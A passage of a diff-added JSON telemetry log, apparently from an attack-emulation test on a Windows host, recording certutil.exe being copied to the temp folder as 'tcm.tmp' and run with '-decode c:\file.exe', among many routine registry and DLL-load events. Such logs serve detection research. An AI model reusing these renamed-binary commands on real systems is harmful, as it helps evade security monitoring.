Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573501040000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "registry", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": 
"C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573501040000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "registry", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573501040000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "process", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "subtype": "terminate", + "timestamp": 131883573501040000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "file", + "file_name": "CERTUTIL.EXE-CB7805D7.pf", + "file_path": "C:\\Windows\\Prefetch\\CERTUTIL.EXE-CB7805D7.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883573501040000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "process", + "pid": 4760, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573501040000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-00106CAC5501}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": 
"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 4308, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573501270016, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010FEB35501}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4308, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573501200016, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010FEB35501}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4308, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573501200016, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010FEB35501}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4308, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573501200016, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010FEB35501}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4308, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573501200016, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010FEB35501}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4308, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573501200016, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010FEB35501}" + }, + { 
+ "event_type": "process", + "pid": 4308, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573501360000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010FEB35501}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"cmd.exe /c copy %%windir%%\\\\system32\\\\certutil.exe %%temp%%tcm.tmp\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 3940, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573501930000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-00105FB85501}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3940, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573501820000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-00105FB85501}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3940, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573501820000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-00105FB85501}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3940, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573501820000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-00105FB85501}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + 
"pid": 3940, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573501820000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-00105FB85501}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3940, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573501820000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-00105FB85501}" + }, + { + "command_line": "cmd.exe /c copy C:\\WINDOWS\\\\system32\\\\certutil.exe C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3452, + "ppid": 3940, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573502020000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}", + "unique_ppid": "{42FC7E13-CBE6-5C05-0000-00105FB85501}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3452, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573501980000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3452, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573501980000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3452, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 
131883573501980000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3452, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573501980000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3452, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573501980000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" + }, + { + "event_type": "file", + "file_name": "Temptcm.tmp", + "file_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "pid": 3452, + "process_name": "cmd.exe", + "process_path": "C:\\WINDOWS\\system32\\cmd.exe", + "timestamp": 131883573501980000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 3452, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573501980000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 3452, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573501980000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3452, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573501980000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" + }, + { + "event_type": "image_load", + 
"image_name": "ntmarta.dll", + "image_path": "C:\\Windows\\System32\\ntmarta.dll", + "pid": 3452, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573501980000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 3452, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573501980000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" + }, + { + "event_type": "process", + "pid": 3452, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573502140000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" + }, + { + "event_type": "process", + "pid": 3940, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573502140000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-00105FB85501}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"cmd.exe /c %%temp%%tcm.tmp -decode c:\\file.exe\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 1852, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573502260000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010F6BA5501}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1852, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 
131883573502140000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010F6BA5501}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1852, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573502140000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010F6BA5501}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1852, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573502140000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010F6BA5501}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1852, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573502140000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010F6BA5501}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1852, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573502300000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010F6BA5501}" + }, + { + "command_line": "cmd.exe /c C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp -decode c:\\file.exe", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5572, + "ppid": 1852, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573502380016, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010ECBB5501}", + "unique_ppid": "{42FC7E13-CBE6-5C05-0000-0010F6BA5501}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + 
"image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5572, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573502300000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010ECBB5501}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5572, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573502300000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010ECBB5501}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5572, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573502300000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010ECBB5501}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5572, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573502300000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010ECBB5501}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5572, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573502300000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010ECBB5501}" + }, + { + "command_line": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp -decode c:\\file.exe", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 976, + "ppid": 5572, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "subtype": "create", + "timestamp": 131883573502530000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}", + 
"unique_ppid": "{42FC7E13-CBE6-5C05-0000-0010ECBB5501}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "Temptcm.tmp", + "image_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502610000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502610000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502610000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502610000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": 
"C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "crypt32.dll", + "image_path": "C:\\Windows\\System32\\crypt32.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "msasn1.dll", + "image_path": "C:\\Windows\\System32\\msasn1.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": 
"C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "normaliz.dll", + "image_path": "C:\\Windows\\System32\\normaliz.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "setupapi.dll", + "image_path": "C:\\Windows\\System32\\setupapi.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": 
"C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "cfgmgr32.dll", + "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "shell32.dll", + "image_path": "C:\\Windows\\System32\\shell32.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "SHCore.dll", + "image_path": "C:\\Windows\\System32\\SHCore.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "windows.storage.dll", + "image_path": "C:\\Windows\\System32\\windows.storage.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + 
"process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\System32\\shlwapi.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "profapi.dll", + "image_path": "C:\\Windows\\System32\\profapi.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "powrprof.dll", + "image_path": "C:\\Windows\\System32\\powrprof.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "fltLib.dll", + "image_path": "C:\\Windows\\System32\\fltLib.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "Wldap32.dll", + "image_path": "C:\\Windows\\System32\\Wldap32.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": 
"C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\System32\\ole32.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "certcli.dll", + "image_path": "C:\\Windows\\System32\\certcli.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "cabinet.dll", + "image_path": "C:\\Windows\\System32\\cabinet.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "comctl32.dll", + "image_path": "C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17134.441_none_f952a0bb30955e96\\comctl32.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "cryptui.dll", + "image_path": "C:\\Windows\\System32\\cryptui.dll", + 
